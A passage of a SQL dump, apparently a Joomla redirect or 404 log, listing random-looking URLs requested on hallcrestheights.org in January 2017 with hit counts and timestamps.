00:00:00'),(5476,'http://www.hallcrestheights.org/bsoapaza-psta-i20162634-sgmhcqc/mckfrdtf-kgpvbchs-k35131-iwho-rklv/',NULL,'','',1,0,'2017-01-15 11:26:14','0000-00-00 00:00:00'),(5477,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge/fvbbgz-agpec-iyyu-wuvfzt-i20162631-k5823-jigjin/',NULL,'','',1,0,'2017-01-15 11:30:02','0000-00-00 00:00:00'),(5478,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx/k6723-oqkgqa-qydcp-tznz-vtjqoe-i20162631-vpcaqw/',NULL,'','',1,0,'2017-01-15 11:33:48','0000-00-00 00:00:00'),(5479,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop/k46899-dgfnh-i20162628-skrl-jrgfctf-zfiwxwm-akoay/',NULL,'','',1,0,'2017-01-15 11:37:35','0000-00-00 00:00:00'),(5480,'http://www.hallcrestheights.org/i20162634-htxwh-ykrsvs-vhudy-kbqx-dosfiet-k43457-yuaixnrb/',NULL,'','',11,0,'2017-01-15 11:40:05','0000-00-00 00:00:00'),(5481,'http://www.hallcrestheights.org/i20162632-bsoapa-zapstasg-mhcq/cmckf-rdtf-kgpvbch-siwhork-k60039-lvzrt/',NULL,'','',1,0,'2017-01-15 11:41:21','0000-00-00 00:00:00'),(5482,'http://www.hallcrestheights.org/i20162632-tkuykf-jdnjjbuc-yupa/jaylr-lwfv-dyruqpk-lsdefhx-k40239-dfpdf/',NULL,'','',1,0,'2017-01-15 11:45:09','0000-00-00 00:00:00'),(5483,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb/qxdos-i20162628-fiet-yuaixnr-bdggsaa-k47799-rhefs/',NULL,'','',1,0,'2017-01-15 11:48:56','0000-00-00 00:00:00'),(5484,'http://www.hallcrestheights.org/cwhriw-i20162633-gpekzqdw-kvum/k17739-zbsai-imjz-fozgdvd-dqjvdob-knlyk/',NULL,'','',1,0,'2017-01-15 11:52:42','0000-00-00 00:00:00'),(5485,'http://www.hallcrestheights.org/htxwhy-k59239-krsvsvhu-dykb-qxdos/i20162632-fiet-yuaixnr-bdggsaa-rhefs-kjydmr/',NULL,'','',1,0,'2017-01-15 12:07:51','0000-00-00 00:00:00'),(5486,'http://www.hallcrestheights.org/soegsz-k17839-xyifetvt-ndyu-uhvfc/yzls-i20162633-xxqroxa-ehkskxy-xembu-qudtwq/',NULL,'','',1,0,'2017-01-15 12:11:38','0000-00-00 00:00:00'),(5487,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-dgfnh/skrlj-k15855-rgfctfz-fiwx-wmakoayo-smpql-i20162629-gvegdf/',NULL,'','',1,0,'2017-01-15 12:19:12','0000-00-00 00:00:00'),(5488,'http://www.hallcrestheights.org/oiyizgol-k28491-rcmw-fbsnopd-i20162633-gfnhskrl/jrgfctfz-fiwx-wmak-oayos-mpql-gvegdfv/',NULL,'','',1,0,'2017-01-15 12:22:59','0000-00-00 00:00:00'),(5489,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf/i20162630-ietyu-k36723-aixn-rbdggs-aarhef-skjydmr-ujwim-jqiaa/',NULL,'','',1,0,'2017-01-15 12:30:33','0000-00-00 00:00:00'),(5490,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq/i20162634-kgqaqyd-cptznzvt-jqoevpca-k32307-qwjaluw-tybckbsx-bnbgn/',NULL,'','',1,0,'2017-01-15 12:34:21','0000-00-00 00:00:00'),(5491,'http://www.hallcrestheights.org/qlbowc-iggeceay-k5799-afxr-i20162629-glnik/ghhm-bbxpges-mrcaizt-biauw-dtvixp-mtzh-zzwzrqrd/',NULL,'','',1,0,'2017-01-15 12:38:07','0000-00-00 00:00:00'),(5492,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-i20162629-qxdos/k4899-fiet-yuaixnr-bdggsaa-rhefs-kjydmr-ujwi-mjqiaaur/',NULL,'','',1,0,'2017-01-15 12:41:54','0000-00-00 00:00:00'),(5493,'http://www.hallcrestheights.org/wbwpbonk-i20162633-ydhx-k18391-jjikvfv/tzpxbxkc-wjybtylw-osdu-ieqg/',NULL,'','',1,0,'2017-01-15 12:50:19','0000-00-00 00:00:00'),(5494,'http://www.hallcrestheights.org/nfrk-opdobbu/i20162630-mgolzes-rkwtz-qtqbs-k27995-vjcwjbx/',NULL,'','',1,0,'2017-01-15 12:55:15','0000-00-00 00:00:00'),(5495,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos/fiet-yuaixnr-bdggsaa-i20162633-rhefs-k18939-kjydmr-ujwi-mjqiaaur/',NULL,'','',1,0,'2017-01-15 12:57:02','0000-00-00 00:00:00'),(5496,'http://www.hallcrestheights.org/pcscq-rufu-k41634-npkw/xpoideot-i20162636-wtvsoarm-osmgep-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-15 13:00:49','0000-00-00 00:00:00'),(5497,'http://www.hallcrestheights.org/i20162632-lugdl-trsm-k21834-xxhy/pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-15 13:15:57','0000-00-00 00:00:00'),(5498,'http://www.hallcrestheights.org/fadlaj-fnlgfp-k44226-cvwgmy/hdec-wxbdeu-i20162637-dkovfi-ibptq-uhzxchh.htm',NULL,'','',1,0,'2017-01-15 13:19:44','0000-00-00 00:00:00'),(5499,'http://www.hallcrestheights.org/ixnmu-eahw-hioz/hjxbnwpg-i20162636-eyooayik-uksszq-k42534-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-15 13:23:30','0000-00-00 00:00:00'),(5500,'http://www.hallcrestheights.org/upttm-i20162633-nbea-k37314-tgrb/nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-15 13:27:18','0000-00-00 00:00:00'),(5501,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh/i20162635-xptvuhm-iwnz-korpv-k4950-ubfgnq-tpmh.htm',NULL,'','',2,0,'2017-01-15 13:34:55','0000-00-00 00:00:00'),(5502,'http://www.hallcrestheights.org/mrcqg-beif-uwgr/abtnwyrq-i20162636-semgwkow-hmemxg-k32454-kucyb-npzkic.htm',NULL,'','',1,0,'2017-01-15 13:38:39','0000-00-00 00:00:00'),(5503,'http://www.hallcrestheights.org/edzvd-lqco-k11754-mnnm/mcawvbfu-i20162636-japyvrlf-lxhqjk-uhkcm-umbhmg.htm',NULL,'','',1,0,'2017-01-15 13:42:26','0000-00-00 00:00:00'),(5504,'http://www.hallcrestheights.org/i20162632-vqjny-spvh-oljp/eurrtpil-uourxivl-btrhnn-k59814-mtqzk-owtsxp.htm',NULL,'','',1,0,'2017-01-15 13:46:13','0000-00-00 00:00:00'),(5505,'http://www.hallcrestheights.org/pcscqruf-unpkw-k5130-xpoideot/wtvsoar-i20162636-mosm-gepla-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-15 13:50:00','0000-00-00 00:00:00'),(5506,'http://www.hallcrestheights.org/lugdl-trsm-k21834-xxhy/pzqjllzo-hnjumnte-i20162637-cwfogy-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-15 13:53:46','0000-00-00 00:00:00'),(5507,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-k17514-yysl/lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-15 13:57:34','0000-00-00 00:00:00'),(5508,'http://www.hallcrestheights.org/zmkue-dtzj-k53154-ivyo/qxifgxuh-i20162636-xptvuhmi-wnzkor-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-15 14:05:08','0000-00-00 00:00:00'),(5509,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl-k37170-lgeajanp/dmefnxh-qfhj-dyhao-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-01-15 14:12:42','0000-00-00 00:00:00'),(5510,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k18090-pzqjllzo/hnjumnt-i20162628-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-15 14:16:29','0000-00-00 00:00:00'),(5511,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k46530-lgeajanp/dmefnxh-i20162636-qfhj-dyhao-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-01-15 14:24:03','0000-00-00 00:00:00'),(5512,'http://www.hallcrestheights.org/i20162635-k6100-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj.htm',NULL,'','',4,0,'2017-01-15 14:25:22','0000-00-00 00:00:00'),(5513,'http://www.hallcrestheights.org/pcscqruf-unpkw-i20162634-k47250-xpoideot/wtvsoar-mosm-gepla-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-15 14:27:50','0000-00-00 00:00:00'),(5514,'http://www.hallcrestheights.org/i20162632-zmkuedtz-jivyo-k35370-qxifgxuh/xptvuhm-iwnz-korpv-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-15 14:31:37','0000-00-00 00:00:00'),(5515,'http://www.hallcrestheights.org/i20162632-jgletkym-drqzn-rvmlkswa/zvkecqq-neei-aqjzl-k16470-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-15 14:35:24','0000-00-00 00:00:00'),(5516,'http://www.hallcrestheights.org/pcsc-i20162633-qrufunp-k63162-kwxpo/ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx.htm',NULL,'','',1,0,'2017-01-15 14:39:11','0000-00-00 00:00:00'),(5517,'http://www.hallcrestheights.org/edzvd-k32554-lqco-mnnm-mcawvbfu/japyvrlf-lxhqjk-uhkcm-umbhmg-i20162636-znkoh.htm',NULL,'','',1,0,'2017-01-15 14:42:57','0000-00-00 00:00:00'),(5518,'http://www.hallcrestheights.org/mrcq-gbeifuw-grabt/nwyrqs-i20162628-emgwkow-hmemxgku-k16542-cybnpzk-icvejxku.htm',NULL,'','',1,0,'2017-01-15 14:46:44','0000-00-00 00:00:00'),(5519,'http://www.hallcrestheights.org/qlbowcig-k39391-gece/ayafxrg-i20162633-lnikghhm-bbxpgesm/',NULL,'','',1,0,'2017-01-15 14:52:53','0000-00-00 00:00:00'),(5520,'http://www.hallcrestheights.org/mrcqg-beif/k734-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg.htm',NULL,'','',1,0,'2017-01-15 15:17:01','0000-00-00 00:00:00'),(5521,'http://www.hallcrestheights.org/i20162632-ixnmu-eahw-hioz/hjxbnwpg-eyooayik-uksszq-k42534-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-15 15:20:48','0000-00-00 00:00:00'),(5522,'http://www.hallcrestheights.org/i20162632-fadlajfn-lgfpc-vwgmyhde/cwxbdeu-dkov-fiibp-k36270-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-15 15:28:22','0000-00-00 00:00:00'),(5523,'http://www.hallcrestheights.org/vqjnyspv-holjp-k25650-eurrtpil/i20162635-uourxiv-lbtr-hnnmt-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-15 15:32:09','0000-00-00 00:00:00'),(5524,'http://www.hallcrestheights.org/jglet-k1234-kymd-rqzn-rvmlkswa/zvkecqqn-i20162633-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-15 15:35:56','0000-00-00 00:00:00'),(5525,'http://www.hallcrestheights.org/lugdl-k42634-trsm-xxhy-pzqjllzo/i20162632-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz.htm',NULL,'','',1,0,'2017-01-15 15:43:30','0000-00-00 00:00:00'),(5526,'http://www.hallcrestheights.org/i20162632-fadlajf-nlgfpcvw-gmyhdecw/xbdeudk-ovfiib-ptquh-k62478-zxchhrmx-agfp.htm',NULL,'','',1,0,'2017-01-15 15:47:17','0000-00-00 00:00:00'),(5527,'http://www.hallcrestheights.org/i20162637-upttmnbe-k61390-atgrb-nqcdcncx-rdhcpgz/zdll-imvyx-jltfeo-bkeb-wivsmqkr.htm',NULL,'','',1,0,'2017-01-15 15:51:04','0000-00-00 00:00:00'),(5528,'http://www.hallcrestheights.org/zmkuedt-k478-zjivyoqx-ifgxuhxp-tvuhmiw/nzkorp-i20162633-vubfg-nqtpmhpr-bikz-onmtla.htm',NULL,'','',1,0,'2017-01-15 16:02:25','0000-00-00 00:00:00'),(5529,'http://www.hallcrestheights.org/pcsc-qrufunp-k762-kwxpo-ideotw/i20162634-tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo-wopegtqa.htm',NULL,'','',1,0,'2017-01-15 16:06:12','0000-00-00 00:00:00'),(5530,'http://www.hallcrestheights.org/k5214-vqjny-spvh-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-i20162633-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-15 16:09:59','0000-00-00 00:00:00'),(5531,'http://www.hallcrestheights.org/wbwpb-onkydh/xjjik-i20162635-k1907-vfvt/',NULL,'','',1,0,'2017-01-15 16:13:46','0000-00-00 00:00:00'),(5532,'http://www.hallcrestheights.org/gnfzn-xvjx-k434-palt-itjshkyj/yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-15 16:17:33','0000-00-00 00:00:00'),(5533,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt/ecwf-i20162631-ogywb-iwyrur-fgvf-cwqzhrib-k50070-nknyfeeb-sbjhfk.htm',NULL,'','',1,0,'2017-01-15 16:21:20','0000-00-00 00:00:00'),(5534,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm/iwnz-i20162631-korpv-ubfgnq-k50970-tpmh-prbikzon-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-15 16:28:54','0000-00-00 00:00:00'),(5535,'http://www.hallcrestheights.org/vqjnysp-vholjpeu-k41978-rrtpiluo-urxivlb/i20162632-trhnnm-tqzko-wtsxppbg-rrcd-sikibk-xnpf-ovpy-aybgo.htm',NULL,'','',1,0,'2017-01-15 16:36:28','0000-00-00 00:00:00'),(5536,'http://www.hallcrestheights.org/i20162632-xhajvq-lwczbiqs/osqx-k50039-oqkgq/',NULL,'','',1,0,'2017-01-15 16:40:15','0000-00-00 00:00:00'),(5537,'http://www.hallcrestheights.org/ixnmueah-whioz-k14870-hjxbnwpg-eyooayi/i20162632-kuks-szqce-baqdom-ytni-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-15 16:44:02','0000-00-00 00:00:00'),(5538,'http://www.hallcrestheights.org/htxwh-ykrsvs/k44107-vhudy-kbqx-i20162634-dosfiet/',NULL,'','',1,0,'2017-01-15 16:47:48','0000-00-00 00:00:00'),(5539,'http://www.hallcrestheights.org/ajqxxu-i20162629-cuzaofif/ephi-ijimj-njbo-k15899-gtsakbc/',NULL,'','',1,0,'2017-01-15 16:51:36','0000-00-00 00:00:00'),(5540,'http://www.hallcrestheights.org/i20162628-qlbowc-iggeceay/afxr-glnik-ghhm-k59099-bbxpges/',NULL,'','',1,0,'2017-01-15 16:59:10','0000-00-00 00:00:00'),(5541,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx/i20162628-oqkgq-aqyd-cptznzv-k58099-tjqoevp/',NULL,'','',1,0,'2017-01-15 17:02:57','0000-00-00 00:00:00'),(5542,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos/i20162635-k1107-qxoq-kgqaqyd-cptznzvt-jqoevpca-qwjaluw/',NULL,'','',1,0,'2017-01-15 17:14:18','0000-00-00 00:00:00'),(5543,'http://www.hallcrestheights.org/i20162628-tkuykf-k58699-jdnjjbuc-yupa-jaylr/lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj/',NULL,'','',1,0,'2017-01-15 17:18:05','0000-00-00 00:00:00'),(5544,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx/bxkc-wjybtyl-wosduie-qgwso-gxhgpi-i20162629-k15999-sdht/',NULL,'','',1,0,'2017-01-15 17:21:52','0000-00-00 00:00:00'),(5545,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz/qtqb-svjcwjb-xnmyvss-sldjz-naahjb-i20162629-k15099-kwxr/',NULL,'','',1,0,'2017-01-15 17:29:26','0000-00-00 00:00:00'),(5546,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-oqkgqa/i20162630-qydcp-tznz-vtjqoe-k45723-vpcaqw-jaluwty-bckbs-xbnbg/',NULL,'','',1,0,'2017-01-15 17:33:13','0000-00-00 00:00:00'),(5547,'http://www.hallcrestheights.org/i20162628-yembjv-htqqdckz-fltz-terqb/wnsw-nsnjplp-ftrrjnc-ypjoq-wgzjev-ihsd-pacaylhy-k57899-ayzeueiz/',NULL,'','',2,0,'2017-01-15 17:37:01','0000-00-00 00:00:00'),(5548,'http://www.hallcrestheights.org/i20162628-lugdltrs-mxxhy/k8990-pzqjllzo-hnjumnt.htm',NULL,'','',1,0,'2017-01-15 17:40:47','0000-00-00 00:00:00'),(5549,'http://www.hallcrestheights.org/i20162632-vqjnyspv-holjp/k46970-eurrtpil-uourxiv.htm',NULL,'','',1,0,'2017-01-15 17:44:34','0000-00-00 00:00:00'),(5550,'http://www.hallcrestheights.org/i20162628-pcscqruf-unpkw/k28790-xpoideot-wtvsoar.htm',NULL,'','',1,0,'2017-01-15 17:48:21','0000-00-00 00:00:00'),(5551,'http://www.hallcrestheights.org/ryvhrhmq-tyysl/k39770-lgeajanp-i20162631-dmefnxh.htm',NULL,'','',1,0,'2017-01-15 17:52:08','0000-00-00 00:00:00'),(5552,'http://www.hallcrestheights.org/i20162628-ixnmueah-whioz/k29690-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-15 17:55:55','0000-00-00 00:00:00'),(5553,'http://www.hallcrestheights.org/gnfzn-xvjx/palt-i20162633-itjshkyj-k10834-yldpijaa.htm',NULL,'','',1,0,'2017-01-15 17:59:42','0000-00-00 00:00:00'),(5554,'http://www.hallcrestheights.org/lugdltr-smxxhypz/i20162630-k37538-qjllzohn-jumntec.htm',NULL,'','',1,0,'2017-01-15 18:03:31','0000-00-00 00:00:00'),(5555,'http://www.hallcrestheights.org/mrcqg-beif/i20162632-uwgr-abtnwyrq-k54034-semgwkow.htm',NULL,'','',1,0,'2017-01-15 18:07:16','0000-00-00 00:00:00'),(5556,'http://www.hallcrestheights.org/k30490-gnfznxvj-xpalt/itjshkyj-i20162628-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-15 18:11:03','0000-00-00 00:00:00'),(5557,'http://www.hallcrestheights.org/i20162635-k16450-gnfznxvj-xpalt/itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-15 18:14:51','0000-00-00 00:00:00'),(5558,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj/i20162632-xbnwpgey-k51478-ooayiku-ksszqc.htm',NULL,'','',1,0,'2017-01-15 18:22:24','0000-00-00 00:00:00'),(5559,'http://www.hallcrestheights.org/lugdltr-smxxhypz/i20162632-qjllzohn-k30778-jumntec-wfogyw.htm',NULL,'','',1,0,'2017-01-15 18:26:12','0000-00-00 00:00:00'),(5560,'http://www.hallcrestheights.org/ryvhrhmq-i20162635-tyysl/k17150-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-15 18:29:58','0000-00-00 00:00:00'),(5561,'http://www.hallcrestheights.org/lugdl-i20162633-trsm-xxhy/k11434-pzqjllzo-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',1,0,'2017-01-15 18:33:45','0000-00-00 00:00:00'),(5562,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde/i20162628-cwxbdeu-dkov-k9490-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-15 18:37:32','0000-00-00 00:00:00'),(5563,'http://www.hallcrestheights.org/i20162632-fadlajfn-lgfpc-vwgmyhde/cwxbdeu-dkov-k25870-fiibp-tquhzx.htm',NULL,'','',1,0,'2017-01-15 18:41:23','0000-00-00 00:00:00'),(5564,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx/i20162628-rdhcpgz-zdll-imvyx-k30190-jltfeo.htm',NULL,'','',1,0,'2017-01-15 18:45:06','0000-00-00 00:00:00'),(5565,'http://www.hallcrestheights.org/k50890-pcscqruf-unpkw-xpoideot/wtvsoar-mosm-i20162637-gepla-lheliy.htm',NULL,'','',1,0,'2017-01-15 18:48:53','0000-00-00 00:00:00'),(5566,'http://www.hallcrestheights.org/fadl-k11362-ajfnlgf-i20162634-pcvwg/myhdec-wxbdeud-kovfiibp-tquhzxc.htm',NULL,'','',1,0,'2017-01-15 18:52:40','0000-00-00 00:00:00'),(5567,'http://www.hallcrestheights.org/jglet-kymd-rqzn-i20162633-rvmlkswa/k16314-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve.htm',NULL,'','',8,0,'2017-01-15 18:59:55','0000-00-00 00:00:00'),(5568,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-gfpc/vwgmyhde-cwxbdeud-kovfii-k11934-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-15 19:00:14','0000-00-00 00:00:00'),(5569,'http://www.hallcrestheights.org/i20162632-upttm-nbea-k32634-tgrb/nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-15 19:04:01','0000-00-00 00:00:00'),(5570,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj-k11034-ivyo/qxifgxuh-xptvuhmi-wnzkor-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-15 19:07:48','0000-00-00 00:00:00'),(5571,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-i20162629-k5349-rkwtz-qtqb-svjcwjb-xnmyvss-sldjz-naahjb-kwxr-osholvgw/',NULL,'','',4,0,'2017-01-15 19:08:28','0000-00-00 00:00:00'),(5572,'http://www.hallcrestheights.org/i20162632-gnfzn-xvjx-k52434-palt/itjshkyj-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-15 19:11:35','0000-00-00 00:00:00'),(5573,'http://www.hallcrestheights.org/i20162632-jgletky-k32278-mdrqznrv-mlkswazv/kecqqne-eiaqjz-lnplq-fcnebxil.htm',NULL,'','',1,0,'2017-01-15 19:15:22','0000-00-00 00:00:00'),(5574,'http://www.hallcrestheights.org/edzvd-k6814-lqco-mnnm-mcawvbfu/japyvrlf-i20162633-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',2,0,'2017-01-15 19:22:56','0000-00-00 00:00:00'),(5575,'http://www.hallcrestheights.org/i20162632-dvisciw-bvwkuxkr-bzomsmvu/clzuphv-qawuox-zmnpz-k53478-vsgcrlyc-mczo.htm',NULL,'','',1,0,'2017-01-15 19:26:43','0000-00-00 00:00:00'),(5576,'http://www.hallcrestheights.org/k32012-mrcq-gbeifuw-i20162634-grabt-nwyrqs.htm',NULL,'','',8,0,'2017-01-15 19:30:08','0000-00-00 00:00:00'),(5577,'http://www.hallcrestheights.org/i20162632-jgletky-mdrqznrv-k30978-mlkswazv/kecqqne-eiaqjz-lnplq-fcnebxil-nvox.htm',NULL,'','',2,0,'2017-01-15 19:30:30','0000-00-00 00:00:00'),(5578,'http://www.hallcrestheights.org/gnfznxvj-k3970-xpalt-itjshkyj-yldpija/i20162632-amdu-rtaen-pggwtd-vlxt-dqkunfgl.htm',NULL,'','',1,0,'2017-01-15 19:34:24','0000-00-00 00:00:00'),(5579,'http://www.hallcrestheights.org/mrcqgbei-k16750-fuwgr-abtnwyrq-semgwko/whme-mxgku-cybnpz-i20162635-kicv-ejxkulzj.htm',NULL,'','',1,0,'2017-01-15 19:38:04','0000-00-00 00:00:00'),(5580,'http://www.hallcrestheights.org/lugdltr-smxxhypz-qjllzohn-i20162633-jumntec/wfogyw-biwyr-urfgvfcw-qzhr-k9978-ibnkny-feeb.htm',NULL,'','',1,0,'2017-01-15 19:41:51','0000-00-00 00:00:00'),(5581,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-gmyhdecw-i20162633-xbdeudk/ovfiib-ptquh-zxchhrmx-agfp-k11778-apuhgf-qvjd.htm',NULL,'','',1,0,'2017-01-15 19:45:38','0000-00-00 00:00:00'),(5582,'http://www.hallcrestheights.org/k45870-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko/whme-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-15 19:49:25','0000-00-00 00:00:00'),(5583,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-i20162632-cdcncxrd-hcpgzzd/llimvy-xjltf-eobkebwi-vsmq-k32478-krfbml-kmst.htm',NULL,'','',1,0,'2017-01-15 19:53:12','0000-00-00 00:00:00'),(5584,'http://www.hallcrestheights.org/k30390-dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-i20162628-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-15 19:56:59','0000-00-00 00:00:00'),(5585,'http://www.hallcrestheights.org/upttmnb-eatgrbnq-cdcncxrd-k51978-hcpgzzd/llimvy-xjltf-i20162632-eobkebwi-vsmq-krfbml-kmst-howg.htm',NULL,'','',1,0,'2017-01-15 20:00:46','0000-00-00 00:00:00'),(5586,'http://www.hallcrestheights.org/ixnmu-eahw-k6914-hioz-hjxbnwpg/eyooayik-i20162633-uksszq-cebaq-domytn-iholb-dentafy-mluzext-lfgg.htm',NULL,'','',1,0,'2017-01-15 20:04:33','0000-00-00 00:00:00'),(5587,'http://www.hallcrestheights.org/dvisc-iwbv-k32834-wkux-krbzomsm/i20162632-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc-zoqqelu-dpwcmeg-iapx.htm',NULL,'','',1,0,'2017-01-15 20:08:21','0000-00-00 00:00:00'),(5588,'http://www.hallcrestheights.org/ryvhrhmq-tyysl/k35870-lgeajanp-dmefnxh-i20162632-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-15 23:47:46','0000-00-00 00:00:00'),(5589,'http://www.hallcrestheights.org/zmkue-i20162633-dtzj-ivyo/qxifgxuh-k634-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-16 00:21:49','0000-00-00 00:00:00'),(5590,'http://www.hallcrestheights.org/tkuy-kfjdnjj-k49755-bucyupa-i20162629-jaylr/lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-tuxdw/',NULL,'','',1,0,'2017-01-17 06:34:35','0000-00-00 00:00:00'),(5591,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-i20162629-dgfnh/skrlj-k49395-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc/',NULL,'','',1,0,'2017-01-17 06:36:42','0000-00-00 00:00:00'),(5592,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-i20162629-cmckf/rdtfk-gpvbchs-iwho-k48495-rklvzrtj-rsyoa-ayfwgd-xskmy/',NULL,'','',1,0,'2017-01-17 06:38:51','0000-00-00 00:00:00'),(5593,'http://www.hallcrestheights.org/soeg-szxyife-k29955-tvtndyu-i20162629-uhvfc/yzlsx-xqroxae-hksk-xyxembuq-udtwq-ceyvuc-iwqws/',NULL,'','',1,0,'2017-01-17 06:41:00','0000-00-00 00:00:00'),(5594,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-i20162629-terqb/wnswn-snjplpf-k28155-trrj-ncypjoqw-gzjev-ihsdpa-caylh/',NULL,'','',1,0,'2017-01-17 06:43:10','0000-00-00 00:00:00'),(5595,'http://hallcrestheights.org/libraries/joomla/client/comcast/',NULL,'','',834,0,'2017-01-17 06:44:45','0000-00-00 00:00:00'),(5596,'http://www.hallcrestheights.org/k26895-htxw-hykrsvs-vhudykb-qxdos/i20162630-fiety-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau/',NULL,'','',1,0,'2017-01-17 06:49:36','0000-00-00 00:00:00'),(5597,'http://www.hallcrestheights.org/tkuy-kfjdnjj-bucyupa-i20162629-jaylr/lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-k26355-tuxdw/',NULL,'','',1,0,'2017-01-17 06:53:53','0000-00-00 00:00:00'),(5598,'http://www.hallcrestheights.org/k50655-cwhr-iwgpekz-qdwkvum-i20162629-zbsai/imjzf-ozgdvdd-qjvd-obknlykc-onedw-jmaxev-ortbz/',NULL,'','',1,0,'2017-01-17 06:56:03','0000-00-00 00:00:00'),(5599,'http://www.hallcrestheights.org/k36399-kzpffm-sxklrded-hwge-i20162629-fvbbg/zagp-eciyyuw-uvfztji-gjina-mzbcng-tfml-yrghdfip/',NULL,'','',1,0,'2017-01-17 06:58:12','0000-00-00 00:00:00'),(5600,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh/skrl-jrgfctf-i20162632-k29739-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb/',NULL,'','',1,0,'2017-01-17 07:00:20','0000-00-00 00:00:00'),(5601,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf/rdtf-kgpvbch-i20162632-siwhork-lvzrt-k28839-jrsyoa-ayfw-gdxskmyu/',NULL,'','',1,0,'2017-01-17 07:02:29','0000-00-00 00:00:00'),(5602,'http://www.hallcrestheights.org/k17391-yembjvht-qqdc-kzfltzt-erqbwnsw/nsnjplpf-trrj-ncyp-i20162633-joqwg-zjev-ihsdpac-aylhya/',NULL,'','',1,0,'2017-01-17 07:04:38','0000-00-00 